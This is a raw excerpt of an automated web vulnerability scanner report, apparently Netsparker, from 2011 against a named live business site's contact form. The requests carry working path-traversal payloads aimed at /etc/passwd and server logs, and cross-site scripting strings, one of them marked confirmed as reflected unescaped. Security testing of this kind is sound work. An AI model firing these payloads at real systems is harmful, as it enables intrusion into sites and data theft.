OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 265
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

button=Submit&captchaString=3&comments=3&company=3&email=netsparker%40example.com&firstName=Smith&lastName=Smith&leadCategory=3&phone='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000C57)%3c%2fscript%3e&subCategoryId=-1&url=3&value=3&yourInterest=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:35:50 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=9D8F753307D6CD45B89C5214D0D161AA; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, contact, email"/> <meta name="description" content="Getting in touch with the InsideUp team"/> <meta name="robots" content="index; follow"/> <title>Contact us and send your feedback.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('ContactUs',0,'')" alt="Contact Us" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerContactusActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script>
var RecaptchaOptions = {
theme :'custom',
lang :'en',
custom_theme_widget :'recaptcha_widget'
};
</script><div style="background:#eeeeee;"> <table width="902" border="0" align="center" cellpadding="0" cellspacing="0" style="background:url(images/ContectBgImg.png) repeat-y top;"> <tr> <td width="596"> <form method="post" action="contactUs.html"> <input type="hidden" id="value" name="value" value="3" /> <input type="hidden" id="subCategoryId" name="subCategoryId" value="-1" /> <table width="568" border="0" align="right" cellpadding="0" cellspacing="0">
<tr> <td height="84" colspan="2" style="font:bold 24px Arial, Helvetica, sans-serif; color:#2564c7;">Contact Us</td> </tr> <tr> <td colspan="2" style="border-top:1px solid #eaeaea; border-bottom:1px solid #eaeaea;"> <table width="539" border="0" align="left" cellspacing="0" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121; margin:10px 0 15px 0;"> <tr> <td width="257" height="40" align="right">First Name&nbsp;&nbsp; <input type="text" value="Smith" name="firstName" id="firstName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td width="278" align="right">Last Name&nbsp;&nbsp; <input type="text" value="Smith" name="lastName" id="lastName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> </tr> <tr> <td height="40" align="right">Email&nbsp;&nbsp; <input type="text" value="netsparker@example.com" name="email" id="email" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td align="right">Phone&nbsp;&nbsp; <input type="text" value="'"--></style></script><script>netsparker(0x000C57)</script>" name="phone" id="phone" style="width:160px; border:1px groove #c3c3c3;" class="formError" /> </td> </tr> <tr> <td height="40" align="right">Company&nbsp;&nbsp; <input type="text" value="3" name="company" id="company" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> <td align="right"> Your Interest&nbsp;&nbsp; <select value="3" name="yourInterest" id="yourInterest" style="width:160px; border:1px groove #c3c3c3;"> <option>Media Relations</option> <option>Buy Leads</option> <option>Customer Service</option> <option>Investor Relations</option> <option>Partner</option> </select> </td> </tr> <tr> <td align="right">Lead Category&nbsp;&nbsp; <select name="leadCategory" id="leadCategory" class='' style="width:160px;"> <option selected="selected" value="3"></option> </select> </td> <td height="40" align="right">Company URL&nbsp;&nbsp; <input type="text" value="3" name="url" id="url" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> </tr> </table> </td> </tr> <tr> <td width="95" height="115" align="right" valign="top" style="padding:25px 0 0 0; font:normal 12px Arial, Helvetica, sans-serif; padding-right:2px;">Comments&nbsp;&nbsp; </td> <td wid..
- /contactUs.html

/contactUs.html CONFIRMED

http://www.insideup.com/contactUs.html

Parameters

Parameter Type Value
button POST Submit
captchaString POST 3
comments POST 3
company POST 3
email POST netsparker@example.com
firstName POST Smith
lastName POST Smith
leadCategory POST 3
phone POST 3
subCategoryId POST -1
url POST '"--></style></script><script>alert(0x000CE8)</script>
value POST 3
yourInterest POST 3

Request

POST /contactUs.html HTTP/1.1
Referer: http://www.insideup.com/contactUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 265
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

button=Submit&captchaString=3&comments=3&company=3&email=netsparker%40example.com&firstName=Smith&lastName=Smith&leadCategory=3&phone=3&subCategoryId=-1&url='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000CE8)%3c%2fscript%3e&value=3&yourInterest=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:36:05 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=01F25BD067D0ECEE185EF9A74EAE3B30; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, contact, email"/> <meta name="description" content="Getting in touch with the InsideUp team"/> <meta name="robots" content="index; follow"/> <title>Contact us and send your feedback.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('ContactUs',0,'')" alt="Contact Us" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerContactusActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script>
var RecaptchaOptions = {
theme :'custom',
lang :'en',
custom_theme_widget :'recaptcha_widget'
};
